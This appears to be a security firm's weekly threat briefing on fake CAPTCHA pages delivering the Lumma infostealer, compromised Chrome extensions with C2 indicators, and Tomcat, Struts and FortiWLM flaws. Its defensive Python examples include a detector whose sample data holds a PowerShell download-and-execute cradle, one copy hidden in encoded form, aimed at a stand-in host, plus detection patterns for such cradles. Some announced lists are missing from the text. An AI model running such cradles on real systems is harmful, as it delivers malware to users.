This week we briefed our clients on how fake captchas are delivering infostealer malware and how some Google Chrome extensions have been compromised.
KEY TAKEAWAYS
Infostealer malware is one of the most prevalent cybersecurity threats individuals and organizations face today. This type of malware is designed to harvest credentials, session cookies, banking and financial data, and more. In October, researchers at Qualys detailed a new delivery method for the Lumma infostealer: fake CAPTCHA pages.
With this method, users are presented with what looks like a “human verification” page or CAPTCHA portal. The page adds extra “verification steps” that walk the user through opening the Windows Run prompt (Win+R), pasting in a PowerShell command the page has placed on the clipboard, and pressing Enter; that command downloads and executes the malware (see screenshot below). No browser vulnerability is involved: the technique relies entirely on the user running the command themselves.
New research from Guardio Labs details the latest distribution campaign for Lumma Stealer. The threat actors are using malvertising (malicious advertising), in this case through a single ad network, Monetag. The malicious links supplied to Monetag are “cloaked” behind an ad-tracking service, BeMob: the tracking link is what the ad network sees and vets, while the redirect behind it lands the victim on the fake CAPTCHA page. This allows the threat actor to bypass Monetag’s safety and reputation filters and get the malicious ads served.
Guardio’s research also shows that the fake CAPTCHA pages themselves are hosted on large, reputable providers such as Oracle Cloud and Cloudflare R2, so hosting reputation alone will not catch them. Guardio measured the campaign at over 1 million ad impressions per day across 3,000+ publisher sites.
How to Protect Your Organization
The sites serving these malicious ads are overwhelmingly anime and TV/movie streaming sites, which should generally never be visited from a work computer. A content filter at the web gateway that blocks the “entertainment” and “streaming” categories will limit exposure to these advertisements.
Fake CAPTCHA pages should be included in user awareness training, as this is becoming a popular way for threat actors to deliver malware: no legitimate verification step asks the user to open the Run prompt and paste a command. Users should never run commands they do not understand on their workstations. The Run dialog itself can also be removed for standard users via Group Policy (User Configuration > Administrative Templates > Start Menu and Taskbar > “Remove Run menu from Start Menu”, which also disables the Win+R shortcut). Note that this closes only one launch path; application control that restricts PowerShell for standard users (AppLocker or WDAC) is the more robust control.
As always, a fully up-to-date, properly configured EDR solution across all endpoints is an effective defense against this type of malware. The behaviour here is well defined for it to alert on: a PowerShell process whose parent is explorer.exe (the Run dialog is hosted by Explorer) with a command line that fetches remote content and executes it.
Fig 1. Fake Captcha Page | Source: Qualys
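The following Python is an added example, not code from this report or from Qualys or Guardio. It shows the detection logic a SOC would run over process-creation telemetry for the behaviour described above: a command pasted into the Run dialog starts its interpreter (powershell.exe, pwsh.exe or cmd.exe) as a child of explorer.exe, and the command line carries a download-and-execute cradle, possibly hidden inside an -EncodedCommand payload that has to be base64/UTF-16LE decoded before it can be inspected. The events, their field names and the example.invalid URLs are constructed for the example, and the encoded payload is built inside the block itself.

```python
import base64
import ntpath
import re

RUN_DIALOG_PARENT = "explorer.exe"              # the Run dialog is hosted by Explorer
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# (pattern, label): cradle indicators checked against the command line and,
# when present, the decoded -EncodedCommand payload.
CRADLE_PATTERNS = [
    (r"\biwr\b|invoke-webrequest|\bcurl\b|\bwget\b|downloadstring|downloadfile", "download cradle"),
    (r"\biex\b|invoke-expression", "in-memory execution"),
    (r"-w(?:indowstyle)?\s+h(?:idden)?\b", "hidden window"),
]

def encode_ps(command):
    """Build a PowerShell -EncodedCommand argument (base64 of UTF-16LE text)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline):
    """Return the decoded -e/-enc/-EncodedCommand payload, or None if there is none."""
    m = re.search(r"-e[a-z]*\s+([A-Za-z0-9+/=]{20,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

# Constructed process-creation events (not real telemetry), reduced to the
# three fields the logic needs.
SAMPLE_EVENTS = [
    {   # the pasted fake-CAPTCHA command: download, then execute in memory
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": 'powershell -w hidden -c "iwr http://example.invalid/v.txt | iex"',
    },
    {   # the same cradle hidden behind -enc (built here with encode_ps)
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell -nop -w hidden -enc "
                   + encode_ps("iwr http://example.invalid/v.txt | iex"),
    },
    {   # benign: a user opened an interactive console from the Run dialog
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell",
    },
    {   # benign: scripted PowerShell started by a software updater, not by the shell
        "parent": r"C:\Program Files\Example\updater.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\scripts\update.ps1",
    },
]

def classify(event):
    """Return the list of matched indicators; an empty list means not flagged."""
    parent = ntpath.basename(event["parent"]).lower()
    image = ntpath.basename(event["image"]).lower()
    if parent != RUN_DIALOG_PARENT or image not in INTERPRETERS:
        return []
    text = event["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded:
        text = f"{text} {decoded}"          # inspect the decoded payload as well
    reasons = [label for pattern, label in CRADLE_PATTERNS
               if re.search(pattern, text, re.I)]
    if decoded:
        reasons.append("encoded command")
    return reasons

def flag_events(events):
    """Indices and indicators of the events worth raising to an analyst."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]

if __name__ == "__main__":
    for i, reasons in flag_events(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["cmdline"][:60], reasons)
```

The parent-process condition is what keeps the false-positive rate down: PowerShell launched by schedulers, installers or management agents has a different parent, and an interactive console opened from the Run dialog carries no cradle, so neither is flagged. The RunMRU key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer also retains the pasted command on the host and is worth collecting during triage.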
Resources:
https://blog.qualys.com/vulnerabilities-threat-research/2024/10/20/unmasking-lumma-stealer-analyzing-deceptive-tactics-with-fake-captcha
https://www.darkreading.com/cyberattacks-data-breaches/trick-captcha-lumma-stealer-malware
https://labs.guard.io/deceptionads-fake-captcha-driving-infostealer-infections-and-a-glimpse-to-the-dark-side-of-0c516f4dc0b6
Last week, cybersecurity company Cyberhaven disclosed that its Google Chrome extension on the Chrome Web Store had been compromised with malicious code. The code targeted identity data and access tokens of Facebook accounts and communicated with a typosquatted command-and-control (C2) domain, cyberhavenext[.]pro.
Over the weekend, sixteen other Chrome extensions were identified that are suspected of being compromised by the same campaign:
Most of these backdoored extensions have already been removed from the Chrome Web Store. However, removal from the store does not uninstall an extension that is already installed: the malicious version must be removed from each endpoint (or updated to a clean release where the vendor has published one), and because the code harvested session tokens and identity data, any credentials or tokens exposed while it was installed should be revoked and rotated.
The malicious C2 domain cyberhavenext[.]pro resolves to the IP address 149.28.124[.]84. Analysis of this IP shows 16 additional domains registered to it within the last month, many following the same typosquatting pattern. Traffic to the IP or to any of these domains should be treated as malicious. Below are the PacketWatch queries to hunt for this traffic:
*.ip:(149.28.124.84)
http.host:(graphqlnetwork.pro OR videodownloadhelper.pro OR yescaptcha.pro OR castorus.info OR bookmarkfc.info OR primusext.pro OR iobit.pro OR uvoice.live OR cyberhavenext.pro OR internxtvpn.pro OR yujaverity.info OR parrottalks.info OR censortracker.pro OR vpncity.live OR wayinai.live OR moonsift.store OR readermodeext.info)
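For environments without PacketWatch, the same hunt can be run over any proxy or DNS export. The following Python is an added example and not part of the report: it carries the indicators above, matches a host either exactly or as a subdomain of an indicator (so cdn.moonsift[.]store is a hit while iobit.pro.example.com is not, which a naive substring match would get wrong), and reports defanged results. The log lines and client addresses are constructed for the example.

```python
import ipaddress
import re

# Indicators taken from the hunt queries in this report.
C2_IPS = {"149.28.124.84"}
C2_DOMAINS = {
    "graphqlnetwork.pro", "videodownloadhelper.pro", "yescaptcha.pro", "castorus.info",
    "bookmarkfc.info", "primusext.pro", "iobit.pro", "uvoice.live", "cyberhavenext.pro",
    "internxtvpn.pro", "yujaverity.info", "parrottalks.info", "censortracker.pro",
    "vpncity.live", "wayinai.live", "moonsift.store", "readermodeext.info",
}

# Constructed proxy log lines (not real traffic): timestamp client method url status
SAMPLE_LOG = """\
2024-12-28T10:01:12Z 10.0.0.5 GET https://api.cyberhavenext.pro/ 200
2024-12-28T10:01:13Z 10.0.0.5 GET https://www.cyberhaven.com/ 200
2024-12-28T10:02:40Z 10.0.0.9 POST http://149.28.124.84:8080/ 200
2024-12-28T10:03:01Z 10.0.0.9 GET https://iobit.pro.example.com/ 200
2024-12-28T10:03:05Z 10.0.0.7 GET https://cdn.moonsift.store:443/ 200
"""

def host_of(url):
    """Host part of a URL, lowercased, with any port and trailing dot removed."""
    m = re.match(r"^[a-z][a-z0-9+.-]*://([^/:?#]+)", url, re.I)
    return m.group(1).lower().rstrip(".") if m else None

def matches_ioc(host):
    """The indicator a host matches, or None. A domain matches exactly or as a
    parent of the host (subdomains count); substring matching is deliberately
    avoided because it would also hit unrelated names such as iobit.pro.example.com."""
    try:
        if str(ipaddress.ip_address(host)) in C2_IPS:
            return host
    except ValueError:
        pass  # not an IP literal; fall through to the domain check
    labels = host.split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in C2_DOMAINS:
            return candidate
    return None

def defang(ioc):
    """Render an indicator so it cannot be clicked in a report."""
    return ioc.replace(".", "[.]")

def hunt(log_text):
    """(timestamp, client, defanged indicator) for every log line that touched an IOC."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue
        timestamp, client, _method, url, _status = parts[:5]
        host = host_of(url)
        ioc = matches_ioc(host) if host else None
        if ioc:
            hits.append((timestamp, client, defang(ioc)))
    return hits

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(*hit)
```

Matching on DNS query names works the same way; feed the query name straight into matches_ioc. Each hit identifies a client that has the compromised extension installed and should be prioritised for removal and credential rotation.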
Resources:
https://www.cyberhaven.com/blog/cyberhavens-chrome-extension-security-incident-and-what-were-doing-about-it
https://thehackernews.com/2024/12/16-chrome-extensions-hacked-exposing.html
Vulnerability Roundup
Apache disclosed a further race condition vulnerability in its Tomcat web server, tracked as CVE-2024-56337, that can lead to remote code execution (RCE). It is a follow-up to CVE-2024-50379, patched on December 17: that fix was incomplete on some Java versions, so the new CVE documents additional mitigations required beyond the patch. The underlying flaw is a time-of-check/time-of-use race: concurrent reads and uploads of the same file under load can bypass Tomcat’s case-sensitivity checks and cause an uploaded file to be compiled and executed as a JSP. Only servers that have enabled write support in the Default Servlet (the “readonly” initialization parameter set to false; it defaults to true) and that run on a case-insensitive file system such as Windows are exposed.
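As an added example (not code from Apache or from this report), the following Python performs the two configuration checks needed to triage a Tomcat server against this advisory: whether the Default Servlet has write support enabled in conf/web.xml, and whether the running version falls inside the affected ranges listed in this roundup (9.0.0.M1 to 9.0.97, 10.1.0-M1 to 10.1.33, 11.0.0-M1 to 11.0.1). The web.xml excerpt is constructed for the example; whether the file system is case-insensitive is passed in as a flag, since that depends on the host OS rather than on Tomcat.

```python
import re
import xml.etree.ElementTree as ET

# Constructed excerpt of a Tomcat conf/web.xml with write support switched on
# (the shipped default leaves "readonly" unset, which means true).
SAMPLE_WEB_XML = """\
<web-app xmlns="https://jakarta.ee/xml/ns/jakartaee" version="6.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
      <param-name>debug</param-name>
      <param-value>0</param-value>
    </init-param>
    <init-param>
      <param-name>readonly</param-name>
      <param-value>false</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
  </servlet>
</web-app>
"""

# First fixed patch level per affected branch, from the ranges in this roundup.
FIXED_PATCH = {(9, 0): 98, (10, 1): 34, (11, 0): 2}

def _local(tag):
    """Strip the XML namespace: '{https://jakarta.ee/...}servlet' -> 'servlet'."""
    return tag.rsplit("}", 1)[-1]

def default_servlet_readonly(web_xml):
    """Effective value of the DefaultServlet 'readonly' init-param (absent means true)."""
    root = ET.fromstring(web_xml)
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet":
            continue
        fields = {_local(c.tag): (c.text or "").strip() for c in servlet}
        if "DefaultServlet" not in fields.get("servlet-class", ""):
            continue
        for param in servlet:
            if _local(param.tag) != "init-param":
                continue
            kv = {_local(c.tag): (c.text or "").strip() for c in param}
            if kv.get("param-name", "").lower() == "readonly":
                return kv.get("param-value", "true").lower() != "false"
        return True   # DefaultServlet declared without a readonly parameter
    return True       # no DefaultServlet declaration: Tomcat defaults apply

def parse_version(v):
    """Tomcat version string -> comparable tuple; milestones sort before the final release."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:[.-]M(\d+))?", v.strip())
    if not m:
        raise ValueError(f"unrecognised Tomcat version: {v!r}")
    major, minor, patch, milestone = m.groups()
    return (int(major), int(minor), int(patch),
            int(milestone) if milestone else float("inf"))

def vulnerable_version(v):
    """True/False for the branches in the advisory; None for any other branch."""
    major, minor, patch, milestone = parse_version(v)
    fixed = FIXED_PATCH.get((major, minor))
    if fixed is None:
        return None
    return (patch, milestone) < (fixed, float("inf"))

def assess(version, web_xml, case_insensitive_fs):
    """Combine the three preconditions into a verdict for one server."""
    vuln = vulnerable_version(version)
    if vuln is None:
        return "branch not covered by the advisory ranges"
    if not vuln:
        return "patched (still apply the advisory's additional changes)"
    if default_servlet_readonly(web_xml):
        return "vulnerable version, but not exposed: DefaultServlet is read-only"
    if not case_insensitive_fs:
        return "vulnerable version, but not exposed: case-sensitive file system"
    return "EXPOSED: upgrade now and set readonly back to true"

if __name__ == "__main__":
    print(assess("9.0.97", SAMPLE_WEB_XML, case_insensitive_fs=True))
```

The namespace-stripping helper matters in practice: Tomcat 9 ships web.xml under the javaee namespace and Tomcat 10/11 under jakartaee, and a check that hard-codes one of them silently finds nothing on the other.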
The issue affects Apache Tomcat 11.0.0-M1 through 11.0.1, 10.1.0-M1 through 10.1.33, and 9.0.0.M1 through 9.0.97. Administrators are urged to upgrade to 11.0.2, 10.1.34, or 9.0.98 respectively, or later. These additional changes are also required to mitigate the vulnerability:
Apache also released a security advisory for a file upload vulnerability in the Apache Struts framework, tracked as CVE-2024-53677: an attacker can manipulate file upload parameters to achieve path traversal, write an uploaded file outside the intended directory and, depending on the deployment, gain remote code execution. It affects the following versions:
Upgrade to Apache Struts 6.4.0 or later. Upgrading alone is not sufficient: applications must also be migrated from the old file upload interceptor to the new Action File Upload mechanism, which is not backward compatible, so actions that handle uploads need to be reworked.
https://threatprotect.qualys.com/2024/12/16/apache-struts2-remote-code-execution-vulnerability-cve-2024-53677/
A critical vulnerability in Fortinet’s FortiWLM (Wireless LAN Manager), tracked as CVE-2023-34990, was disclosed by Fortinet last week. The flaw is a relative path traversal that allows unauthenticated attackers to read sensitive files on the device, including files that contain the session ID of a logged-in user. With a stolen session, it can be chained with CVE-2023-48782, an authenticated command injection flaw, to gain remote code execution as root. The following versions are affected:
Version      | Affected            | Solution
-------------|---------------------|--------------------------
FortiWLM 8.6 | 8.6.0 through 8.6.5 | Upgrade to 8.6.6 or above
FortiWLM 8.5 | 8.5.0 through 8.5.4 | Upgrade to 8.5.5 or above
NOTE
We have enhanced our report with data from SOCRadar. You may need to register to view their threat intelligence content.
DISCLAIMER
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.